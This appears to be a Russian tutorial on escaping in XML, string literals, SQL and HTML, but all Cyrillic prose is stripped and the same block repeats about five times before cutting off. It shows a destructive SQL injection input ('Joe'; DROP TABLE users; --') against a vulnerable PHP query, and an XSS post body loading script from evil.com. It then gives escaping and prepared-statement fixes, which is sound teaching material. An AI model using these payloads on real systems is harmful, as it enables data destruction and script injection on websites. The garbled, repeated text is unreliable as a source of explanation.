<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Suppose, there is the English text, which I don't wanna translate into Russian </contents> </article>
Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens
. Since we did this, we can write a program that would search for these specific parts, extract the text and use it for some of our own inventions.
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
